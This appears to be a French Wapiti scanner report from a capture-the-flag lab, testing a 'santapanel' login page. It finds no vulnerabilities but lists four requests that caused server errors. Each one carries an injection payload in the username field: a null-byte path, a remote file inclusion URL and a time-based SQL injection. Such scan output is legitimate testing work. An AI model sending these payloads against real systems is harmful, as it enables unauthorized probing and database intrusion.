********************************************************************************
                     Wapiti 3.0.3 - wapiti.sourceforge.io
               Rapport pour http://10.10.188.235:8000/santapanel
                Date du scan : Mon, 07 Dec 2020 09:59:41 +0000
                          Portée de ce scan : folder
********************************************************************************

Résumé des vulnérabilités :
---------------------------
                                                            Injection SQL :   0
                                                 Injection SQL en aveugle :   0
                                                   Divulgation de fichier :   0
                                                     Cross Site Scripting :   0
                                                           Injection CRLF :   0
                                                   Exécution de commandes :   0
                                                Contournement de htaccess :   0
                                                      Copie de sauvegarde :   0
                                        Fichier potentiellement dangereux :   0
                                              Server Side Request Forgery :   0
                                                            Open Redirect :   0
                                                                      XXE :   0
********************************************************************************

Résumé des anomalies :
----------------------
                                                Erreur interne au serveur :   4
                                       Consommation anormale de ressource :   0
********************************************************************************

Erreur interne au serveur
-------------------------
Le serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans le paramètre username
Evil request:
    POST /santapanel HTTP/1.1
    Host: 10.10.188.235:8000
    Referer: http://10.10.188.235:8000/santapanel
    Content-Type: application/x-www-form-urlencoded

    username=%2Fe%00&password=Letm3in_

                                  *   *   *

Le serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans le paramètre username
Evil request:
    POST /santapanel HTTP/1.1
    Host: 10.10.188.235:8000
    Referer: http://10.10.188.235:8000/santapanel
    Content-Type: application/x-www-form-urlencoded

    username=https%3A%2F%2Fwapiti3.ovh%2Fe.php%00&password=Letm3in_

                                  *   *   *

Le serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans le paramètre username
Evil request:
    POST /santapanel HTTP/1.1
    Host: 10.10.188.235:8000
    Referer: http://10.10.188.235:8000/santapanel
    Content-Type: application/x-www-form-urlencoded

    username=%C2%BF%27%22%28&password=Letm3in_

                                  *   *   *

Le serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans le paramètre username
Evil request:
    POST /santapanel HTTP/1.1
    Host: 10.10.188.235:8000
    Referer: http://10.10.188.235:8000/santapanel
    Content-Type: application/x-www-form-urlencoded

    username=%27+or+sleep%287%29%231&password=Letm3in_

                                  *   *   *

********************************************************************************
